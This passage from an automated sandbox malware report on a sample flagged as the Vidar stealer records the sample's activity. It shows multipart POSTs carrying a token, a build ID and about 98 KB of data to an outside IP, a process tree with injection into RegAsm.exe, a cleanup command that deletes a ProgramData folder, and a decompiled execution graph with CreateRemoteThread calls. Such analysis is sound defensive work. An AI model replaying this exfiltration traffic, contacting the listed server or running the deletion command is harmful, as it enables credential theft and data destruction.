                                                                              Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 453
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:47 UTC | 453 | OUT | Data Ascii:
                                                                              ------KFBFCAFCBKFIEBFHIDBA
                                                                              Content-Disposition: form-data; name="token"

                                                                              4deb78246c010994d1326c4b8d4942b2
                                                                              ------KFBFCAFCBKFIEBFHIDBA
                                                                              Content-Disposition: form-data; name="build_id"

                                                                              9ed287469c3721fd5caf346580b2cf0d
                                                                              ------KFBFCAFCBKFIEBFHIDBA
                                                                              Cont
                                                                              2024-05-17 16:06:48 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:48 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              21 | 192.168.2.5 | 49731 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:51 UTC | 327 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 98013
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:51 UTC | 16355 | OUT | Data Ascii:
                                                                              ------HIEBAKEHDHCAKEBFBKEG
                                                                              Content-Disposition: form-data; name="token"

                                                                              4deb78246c010994d1326c4b8d4942b2
                                                                              ------HIEBAKEHDHCAKEBFBKEG
                                                                              Content-Disposition: form-data; name="build_id"

                                                                              9ed287469c3721fd5caf346580b2cf0d
                                                                              ------HIEBAKEHDHCAKEBFBKEG
                                                                              Cont
                                                                              2024-05-17 16:06:53 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:53 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              22 | 192.168.2.5 | 49732 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:54 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:54 UTC | 331 | OUT | Data Ascii:
                                                                              ------IDBAKKECAEGCAKFIIIDH
                                                                              Content-Disposition: form-data; name="token"

                                                                              4deb78246c010994d1326c4b8d4942b2
                                                                              ------IDBAKKECAEGCAKFIIIDH
                                                                              Content-Disposition: form-data; name="build_id"

                                                                              9ed287469c3721fd5caf346580b2cf0d
                                                                              ------IDBAKKECAEGCAKFIIIDH
                                                                              Cont
                                                                              2024-05-17 16:06:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              23 | 192.168.2.5 | 49733 | 95.217.240.101 | 443 | 1600 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-17 16:06:56 UTC | 325 | OUT | POST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:56 UTC | 331 | OUT | Data Ascii:
                                                                              ------EGCGHCBKFCFBFHIDHDBF
                                                                              Content-Disposition: form-data; name="token"

                                                                              4deb78246c010994d1326c4b8d4942b2
                                                                              ------EGCGHCBKFCFBFHIDHDBF
                                                                              Content-Disposition: form-data; name="build_id"

                                                                              9ed287469c3721fd5caf346580b2cf0d
                                                                              ------EGCGHCBKFCFBFHIDHDBF
                                                                              Cont
                                                                              2024-05-17 16:06:57 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Target ID:0
                                                                              Start time:12:05:49
                                                                              Start date:17/05/2024
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0xab0000
                                                                              File size:372'224 bytes
                                                                              MD5 hash:75DB6DFDEBB9BF0D98ACFC15F2219C62
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:12:05:49
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:12:05:49
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x8c0000
                                                                              File size:65'440 bytes
                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:12:06:58
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                                                                              Imagebase:0x790000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:12:06:58
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:12:06:58
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:timeout /t 10
                                                                              Imagebase:0x1f0000
                                                                              File size:25'088 bytes
                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:6%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:2.7%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:60
abbee5 __FrameHandler3::FrameUnwindToState 16874->16875 16876 abbeef 16875->16876 16877 abbf07 16875->16877 16878 abd381 __Wcrtomb 14 API calls 16876->16878 17044 abb2d9 EnterCriticalSection 16877->17044 16880 abbef4 16878->16880 16882 aba48f __strnicoll 42 API calls 16880->16882 16881 abbf11 16883 abbfad 16881->16883 16884 ac1af7 _Ungetc 42 API calls 16881->16884 16888 abbeff 16882->16888 17045 abbe92 16883->17045 16891 abbf2e 16884->16891 16886 abbfb3 17052 abbfdd 16886->17052 16888->16856 16889 abbf85 16890 abd381 __Wcrtomb 14 API calls 16889->16890 16892 abbf8a 16890->16892 16891->16883 16891->16889 16893 aba48f __strnicoll 42 API calls 16892->16893 16893->16888 16895 abc995 __FrameHandler3::FrameUnwindToState 16894->16895 16896 abc99c 16895->16896 16897 abc9b1 16895->16897 16898 abd381 __Wcrtomb 14 API calls 16896->16898 17056 abb2d9 EnterCriticalSection 16897->17056 16900 abc9a1 16898->16900 16902 aba48f __strnicoll 42 API calls 16900->16902 16901 abc9bb 17057 abc890 16901->17057 16904 abc9ac 16902->16904 16904->16858 16908 abb47d __FrameHandler3::FrameUnwindToState 16907->16908 16909 abb49b 16908->16909 16910 abb484 16908->16910 16920 abb2d9 EnterCriticalSection 16909->16920 16911 abd381 __Wcrtomb 14 API calls 16910->16911 16913 abb489 16911->16913 16915 aba48f __strnicoll 42 API calls 16913->16915 16914 abb4a7 16921 abb301 16914->16921 16917 ab34d9 16915->16917 16917->16853 16918 abb4b2 16955 abb4e0 16918->16955 16920->16914 16922 abb31e 16921->16922 16923 abb384 16921->16923 16924 ac1af7 _Ungetc 42 API calls 16922->16924 16926 abb37b 16923->16926 16927 ac1af7 _Ungetc 42 API calls 16923->16927 16925 abb324 16924->16925 16929 ac1af7 _Ungetc 42 API calls 16925->16929 16944 abb347 16925->16944 16926->16918 16928 abb399 16927->16928 16931 ac1af7 _Ungetc 42 API calls 16928->16931 16946 abb3bc 16928->16946 16930 abb330 16929->16930 16936 ac1af7 _Ungetc 42 API calls 16930->16936 16930->16944 16934 abb3a5 16931->16934 16932 abb362 16932->16926 16958 abbece 
16932->16958 16933 abbece 42 API calls 16937 abb3dc 16933->16937 16939 ac1af7 _Ungetc 42 API calls 16934->16939 16934->16946 16938 abb33c 16936->16938 16937->16926 16965 abcd93 16937->16965 16941 ac1af7 _Ungetc 42 API calls 16938->16941 16942 abb3b1 16939->16942 16941->16944 16945 ac1af7 _Ungetc 42 API calls 16942->16945 16944->16923 16944->16932 16945->16946 16946->16926 16946->16933 16947 abb41e 16970 ac1ac0 16947->16970 16949 abbece 42 API calls 16951 abb405 16949->16951 16951->16947 16952 abb40b 16951->16952 16954 abc989 44 API calls 16952->16954 16953 abd381 __Wcrtomb 14 API calls 16953->16926 16954->16926 17043 abb2ed LeaveCriticalSection 16955->17043 16957 abb4e6 16957->16917 16959 abbe92 16958->16959 16960 abbeb3 16959->16960 16961 abd381 __Wcrtomb 14 API calls 16959->16961 16960->16932 16962 abbea3 16961->16962 16963 aba48f __strnicoll 42 API calls 16962->16963 16964 abbeae 16963->16964 16964->16932 16966 ac0590 __Getctype 42 API calls 16965->16966 16967 abcd9e 16966->16967 16968 ac09af __Getctype 42 API calls 16967->16968 16969 abb3f4 16968->16969 16969->16947 16969->16949 16971 ac1ad3 _Fputc 16970->16971 16976 ac198d 16971->16976 16974 aba1cb _Fputc 42 API calls 16975 abb432 16974->16975 16975->16926 16975->16953 16977 ac19a1 16976->16977 16985 ac19b1 16976->16985 16978 ac19d6 16977->16978 16977->16985 16988 abadd0 16977->16988 16980 ac1a0a 16978->16980 16981 ac19e7 16978->16981 16983 ac1a86 16980->16983 16984 ac1a32 16980->16984 16980->16985 16995 ac98ee 16981->16995 16986 ac53eb __strnicoll MultiByteToWideChar 16983->16986 16984->16985 16987 ac53eb __strnicoll MultiByteToWideChar 16984->16987 16985->16974 16986->16985 16987->16985 16998 aba276 16988->16998 17039 acb3f2 16995->17039 16999 aba289 16998->16999 17000 aba280 16998->17000 17005 ac09dc 16999->17005 17013 aba230 GetLastError 17000->17013 17002 aba285 17002->16999 17003 abb171 __purecall 42 API calls 17002->17003 17004 aba292 17003->17004 17006 abadfd 17005->17006 17007 ac09f3 17005->17007 
17009 ac0a3a 17006->17009 17007->17006 17008 ac7efd __Getctype 42 API calls 17007->17008 17008->17006 17010 abae0a 17009->17010 17011 ac0a51 17009->17011 17010->16978 17011->17010 17012 ac655f __strnicoll 42 API calls 17011->17012 17012->17010 17014 aba249 17013->17014 17017 ac0792 17014->17017 17018 ac07a5 17017->17018 17023 ac07ab 17017->17023 17019 ac0ff4 __Getctype 6 API calls 17018->17019 17019->17023 17020 ac1033 __Getctype 6 API calls 17022 ac07c5 17020->17022 17021 aba261 SetLastError 17021->17002 17022->17021 17024 ac0a6b _unexpected 14 API calls 17022->17024 17023->17020 17023->17021 17025 ac07d5 17024->17025 17026 ac07dd 17025->17026 17027 ac07f2 17025->17027 17028 ac1033 __Getctype 6 API calls 17026->17028 17029 ac1033 __Getctype 6 API calls 17027->17029 17030 ac07e9 17028->17030 17031 ac07fe 17029->17031 17035 ac0ac8 ___free_lconv_mon 14 API calls 17030->17035 17032 ac0811 17031->17032 17033 ac0802 17031->17033 17034 ac03be __Getctype 14 API calls 17032->17034 17036 ac1033 __Getctype 6 API calls 17033->17036 17037 ac081c 17034->17037 17035->17021 17036->17030 17038 ac0ac8 ___free_lconv_mon 14 API calls 17037->17038 17038->17021 17040 acb41d _Fputc 17039->17040 17041 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17040->17041 17042 ac9909 17041->17042 17042->16985 17043->16957 17044->16881 17046 abbe9e 17045->17046 17047 abbeb3 17045->17047 17048 abd381 __Wcrtomb 14 API calls 17046->17048 17047->16886 17049 abbea3 17048->17049 17050 aba48f __strnicoll 42 API calls 17049->17050 17051 abbeae 17050->17051 17051->16886 17055 abb2ed LeaveCriticalSection 17052->17055 17054 abbfe3 17054->16888 17055->17054 17056->16901 17058 abc8a8 17057->17058 17060 abc918 17057->17060 17059 ac1af7 _Ungetc 42 API calls 17058->17059 17064 abc8ae 17059->17064 17061 ac2467 _Ungetc 14 API calls 17060->17061 17062 abc910 17060->17062 17061->17062 17068 abc9f4 17062->17068 17063 abc900 17065 abd381 __Wcrtomb 14 API calls 17063->17065 17064->17060 
17064->17063 17066 abc905 17065->17066 17067 aba48f __strnicoll 42 API calls 17066->17067 17067->17062 17071 abb2ed LeaveCriticalSection 17068->17071 17070 abc9fa 17070->16904 17071->17070 16151 ac1e92 16152 ac1af7 _Ungetc 42 API calls 16151->16152 16154 ac1e9f 16152->16154 16153 ac1eab 16154->16153 16155 ac1ef7 16154->16155 16174 ac2228 16154->16174 16155->16153 16162 ac1f59 16155->16162 16182 ac3b38 16155->16182 16163 ac2082 16162->16163 16164 ac1af7 _Ungetc 42 API calls 16163->16164 16165 ac2091 16164->16165 16166 ac20a4 16165->16166 16167 ac2137 16165->16167 16169 ac20c1 16166->16169 16171 ac20e8 16166->16171 16168 ac2f9f ___scrt_uninitialize_crt 67 API calls 16167->16168 16173 ac1f6a 16168->16173 16170 ac2f9f ___scrt_uninitialize_crt 67 API calls 16169->16170 16170->16173 16171->16173 16193 ac3a7c 16171->16193 16175 ac223e 16174->16175 16176 ac2242 16174->16176 16175->16155 16177 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16176->16177 16181 ac2291 16176->16181 16178 ac2263 16177->16178 16179 ac226b SetFilePointerEx 16178->16179 16178->16181 16180 ac2282 GetFileSizeEx 16179->16180 16179->16181 16180->16181 16181->16155 16183 ac3b44 16182->16183 16184 ac1af7 _Ungetc 42 API calls 16183->16184 16187 ac1f4c 16183->16187 16185 ac3b5f 16184->16185 16221 aca462 16185->16221 16187->16162 16188 ac2467 16187->16188 16189 ac0a6b _unexpected 14 API calls 16188->16189 16190 ac2484 16189->16190 16191 ac0ac8 ___free_lconv_mon 14 API calls 16190->16191 16192 ac248e 16191->16192 16192->16162 16194 ac3a90 _Fputc 16193->16194 16199 ac38d3 16194->16199 16197 aba1cb _Fputc 42 API calls 16198 ac3ab4 16197->16198 16198->16173 16200 ac38df __FrameHandler3::FrameUnwindToState 16199->16200 16201 ac38e7 16200->16201 16202 ac39bd 16200->16202 16204 ac393b 16200->16204 16201->16197 16203 aba412 _Fputc 42 API calls 16202->16203 16203->16201 16210 ac6e10 EnterCriticalSection 16204->16210 16206 ac3941 16207 ac3966 16206->16207 16211 ac39f9 16206->16211 16217 ac39b5 16207->16217 16210->16206 
16212 ac6ee7 ___scrt_uninitialize_crt 42 API calls 16211->16212 16213 ac3a0b 16212->16213 16214 ac3a27 SetFilePointerEx 16213->16214 16216 ac3a13 ___scrt_uninitialize_crt 16213->16216 16215 ac3a3f GetLastError 16214->16215 16214->16216 16215->16216 16216->16207 16220 ac6e33 LeaveCriticalSection 16217->16220 16219 ac39bb 16219->16201 16220->16219 16222 aca47c 16221->16222 16223 aca46f 16221->16223 16226 aca488 16222->16226 16227 abd381 __Wcrtomb 14 API calls 16222->16227 16224 abd381 __Wcrtomb 14 API calls 16223->16224 16225 aca474 16224->16225 16225->16187 16226->16187 16228 aca4a9 16227->16228 16229 aba48f __strnicoll 42 API calls 16228->16229 16229->16225 18489 ab49f0 18490 ab49ff 18489->18490 18492 ab4a23 18490->18492 18493 abc856 18490->18493 18494 abc869 _Fputc 18493->18494 18499 abc78d 18494->18499 18496 abc87e 18497 aba1cb _Fputc 42 API calls 18496->18497 18498 abc88b 18497->18498 18498->18492 18500 abc79f 18499->18500 18501 abc7c2 18499->18501 18502 aba412 _Fputc 42 API calls 18500->18502 18501->18500 18504 abc7e9 18501->18504 18503 abc7ba 18502->18503 18503->18496 18507 abc692 18504->18507 18508 abc69e __FrameHandler3::FrameUnwindToState 18507->18508 18515 abb2d9 EnterCriticalSection 18508->18515 18510 abc6ac 18516 abc6ed 18510->18516 18512 abc6b9 18525 abc6e1 18512->18525 18515->18510 18517 abbd66 ___scrt_uninitialize_crt 67 API calls 18516->18517 18518 abc708 18517->18518 18519 ac175b 14 API calls 18518->18519 18520 abc712 18519->18520 18521 ac0a6b _unexpected 14 API calls 18520->18521 18524 abc72d 18520->18524 18522 abc751 18521->18522 18523 ac0ac8 ___free_lconv_mon 14 API calls 18522->18523 18523->18524 18524->18512 18528 abb2ed LeaveCriticalSection 18525->18528 18527 abc6ca 18527->18496 18528->18527 17157 abe8cb 17160 abe597 17157->17160 17161 abe5a3 __FrameHandler3::FrameUnwindToState 17160->17161 17168 abca85 EnterCriticalSection 17161->17168 17163 abe5db 17169 abe5f9 17163->17169 17165 abe5ad 17165->17163 17167 ac7f7e __Getctype 14 API calls 
17165->17167 17167->17165 17168->17165 17172 abcacd LeaveCriticalSection 17169->17172 17171 abe5e7 17172->17171 15853 ab2ed0 15854 ab1100 std::_Throw_Cpp_error 43 API calls 15853->15854 15855 ab2f01 15854->15855 15856 ab5a28 codecvt 3 API calls 15855->15856 15857 ab2f46 15856->15857 15858 ab2f59 std::ios_base::_Ios_base_dtor 15857->15858 15887 ab17b0 15857->15887 15860 ab2f71 VirtualAlloc 15858->15860 15861 ab2fa2 15860->15861 15864 ab3016 std::ios_base::_Ios_base_dtor codecvt 15861->15864 15899 ab12f0 15861->15899 15863 ab30dc 15865 aba49f std::_Throw_Cpp_error 42 API calls 15863->15865 15864->15863 15873 ab22a0 15864->15873 15868 ab30e1 15865->15868 15869 ab30a2 15869->15863 15870 ab30bf std::ios_base::_Ios_base_dtor 15869->15870 15871 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15870->15871 15872 ab30d8 15871->15872 15874 ab5a28 codecvt 3 API calls 15873->15874 15883 ab22d2 std::ios_base::_Ios_base_dtor 15874->15883 15875 ab253b std::ios_base::_Ios_base_dtor 15877 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15875->15877 15878 ab256a CreateRemoteThread WaitForSingleObject 15877->15878 15878->15869 15878->15870 15880 ab2576 15942 ab2820 15880->15942 15881 ab5a28 codecvt 3 API calls 15881->15883 15883->15875 15883->15880 15883->15881 15885 ab2571 15883->15885 15916 ab1250 15883->15916 15924 ab1540 15883->15924 15886 aba49f std::_Throw_Cpp_error 42 API calls 15885->15886 15886->15880 15888 ab1c22 15887->15888 15895 ab17dd std::ios_base::_Ios_base_dtor codecvt 15887->15895 15889 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15888->15889 15890 ab1c33 15889->15890 15890->15858 15891 ab1c3e 15892 ab2830 std::_Throw_Cpp_error 43 API calls 15891->15892 15894 ab1c43 15892->15894 15893 abaefe 45 API calls 15893->15895 15895->15888 15895->15891 15895->15893 15896 ab1100 43 API calls std::_Throw_Cpp_error 15895->15896 15897 ab1c39 15895->15897 15896->15895 15898 aba49f 
std::_Throw_Cpp_error 42 API calls 15897->15898 15898->15891 15900 ab139d codecvt 15899->15900 15901 ab1342 15899->15901 15904 aba49f std::_Throw_Cpp_error 42 API calls 15900->15904 15915 ab144f std::ios_base::_Ios_base_dtor 15900->15915 15902 ab1484 15901->15902 15905 ab138c 15901->15905 15908 ab13b9 15901->15908 15903 ab2800 std::_Throw_Cpp_error RaiseException 15902->15903 15903->15900 15906 ab1493 15904->15906 15905->15902 15907 ab1397 15905->15907 16146 ab2a30 15906->16146 15911 ab5a28 codecvt 3 API calls 15907->15911 15908->15900 15909 ab5a28 codecvt 3 API calls 15908->15909 15909->15900 15911->15900 15912 ab14a1 15913 ab687d CallUnexpected RaiseException 15912->15913 15914 ab14aa 15913->15914 15915->15861 15917 ab12e5 15916->15917 15921 ab1264 15916->15921 15918 ab2830 std::_Throw_Cpp_error 43 API calls 15917->15918 15920 ab12ea 15918->15920 15919 ab1269 codecvt 15919->15883 15921->15919 15945 ab1160 15921->15945 15923 ab12bb codecvt 15923->15883 15925 ab1582 15924->15925 15967 ab20f0 15925->15967 15927 ab15a4 15928 ab16c2 15927->15928 15933 ab16fb std::ios_base::_Init 15927->15933 15975 ab328a 15928->15975 15930 ab159e 15930->15927 15972 ab2eb0 15930->15972 15932 ab16c7 15935 ab16d5 15932->15935 15979 ab2770 15932->15979 15983 ab2000 15933->15983 15935->15883 15937 ab172f 15938 ab687d CallUnexpected RaiseException 15937->15938 15939 ab173d 15938->15939 15997 ab32e4 GetCurrentThreadId 15939->15997 15941 ab175e std::ios_base::_Ios_base_dtor 15941->15883 15943 ab324a std::_Xinvalid_argument 43 API calls 15942->15943 15944 ab282a 15943->15944 15946 ab11b3 15945->15946 15947 ab1170 15945->15947 15950 ab2800 std::_Throw_Cpp_error RaiseException 15946->15950 15948 ab1179 15947->15948 15949 ab119c 15947->15949 15948->15946 15952 ab1180 15948->15952 15953 ab11ad 15949->15953 15956 ab5a28 codecvt 3 API calls 15949->15956 15951 ab1186 15950->15951 15954 aba49f std::_Throw_Cpp_error 42 API calls 15951->15954 15959 ab118f 15951->15959 15955 ab5a28 codecvt 3 API calls 
15952->15955 15953->15923 15957 ab11bd 15954->15957 15955->15951 15958 ab11a6 15956->15958 15960 ab1249 15957->15960 15963 ab11d0 15957->15963 15958->15923 15959->15923 15961 ab2830 std::_Throw_Cpp_error 43 API calls 15960->15961 15962 ab124e 15961->15962 15964 ab11d5 codecvt 15963->15964 15965 ab1100 std::_Throw_Cpp_error 43 API calls 15963->15965 15964->15923 15966 ab1223 codecvt 15965->15966 15966->15923 15968 ab2107 15967->15968 15969 ab211b 15968->15969 16005 ab2af0 15968->16005 15969->15930 16019 ab4e24 15972->16019 15975->15932 15976 ab7220 15975->15976 16117 ab8ecc 15976->16117 15978 ab7225 15978->15932 15980 ab27d3 15979->15980 15981 ab27ae 15979->15981 15980->15935 15981->15980 16127 ab2e40 15981->16127 15984 ab2040 15983->15984 15984->15984 15985 ab11c0 std::ios_base::_Init 43 API calls 15984->15985 15986 ab2054 15985->15986 15987 ab1c80 std::_Throw_Cpp_error 43 API calls 15986->15987 15988 ab2062 15987->15988 15990 ab20b1 15988->15990 15992 ab208a std::ios_base::_Ios_base_dtor 15988->15992 15989 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15991 ab20ab 15989->15991 15993 aba49f std::_Throw_Cpp_error 42 API calls 15990->15993 15991->15937 15992->15989 15994 ab20b6 15993->15994 15995 ab67fb ___std_exception_copy 42 API calls 15994->15995 15996 ab20e1 15995->15996 15996->15937 16134 ab500f 15997->16134 15999 ab3361 16141 ab501b 15999->16141 16002 ab32fd 16002->15999 16137 ab4f39 16002->16137 16140 ab4f57 WakeAllConditionVariable 16002->16140 16006 ab2b31 16005->16006 16012 ab2137 16005->16012 16007 ab20f0 51 API calls 16006->16007 16008 ab2b3a 16007->16008 16009 ab2bb2 16008->16009 16014 ab2bec std::ios_base::_Init 16008->16014 16010 ab328a 8 API calls 16009->16010 16011 ab2bb7 16010->16011 16011->16012 16013 ab2770 43 API calls 16011->16013 16012->15930 16013->16012 16015 ab2000 std::ios_base::_Init 43 API calls 16014->16015 16016 ab2c1e 16015->16016 16017 ab687d CallUnexpected RaiseException 16016->16017 16018 ab2c2c 
16017->16018 16022 ab4e39 16019->16022 16023 ab2ec3 16022->16023 16024 ab4e5f codecvt 16022->16024 16023->15927 16024->16023 16026 ab46a8 16024->16026 16027 ab46ca 16026->16027 16028 ab46d3 16026->16028 16029 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16027->16029 16028->16027 16030 ab4713 16028->16030 16033 ab4739 16028->16033 16031 ab4735 16029->16031 16038 ab34f5 16030->16038 16031->16024 16034 ab4794 16033->16034 16035 ab4775 16033->16035 16034->16027 16041 abc658 16034->16041 16035->16027 16037 ab34f5 _Fputc 46 API calls 16035->16037 16037->16027 16047 abb6e4 16038->16047 16042 abc66b _Fputc 16041->16042 16090 abc437 16042->16090 16044 abc680 16045 aba1cb _Fputc 42 API calls 16044->16045 16046 abc68d 16045->16046 16046->16027 16048 abb6f7 _Fputc 16047->16048 16053 abb4e8 16048->16053 16051 aba1cb _Fputc 42 API calls 16052 ab3503 16051->16052 16052->16027 16054 abb4f4 __FrameHandler3::FrameUnwindToState 16053->16054 16055 abb4fb 16054->16055 16056 abb520 16054->16056 16057 aba412 _Fputc 42 API calls 16055->16057 16064 abb2d9 EnterCriticalSection 16056->16064 16063 abb516 16057->16063 16059 abb52f 16065 abb5ac 16059->16065 16063->16051 16064->16059 16066 abb5e3 16065->16066 16067 abb5d1 _Fputc 16065->16067 16068 ac1af7 _Ungetc 42 API calls 16066->16068 16071 ab5a66 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16067->16071 16069 abb5ea 16068->16069 16070 ac1af7 _Ungetc 42 API calls 16069->16070 16074 abb612 16069->16074 16072 abb5fb 16070->16072 16073 abb540 16071->16073 16072->16074 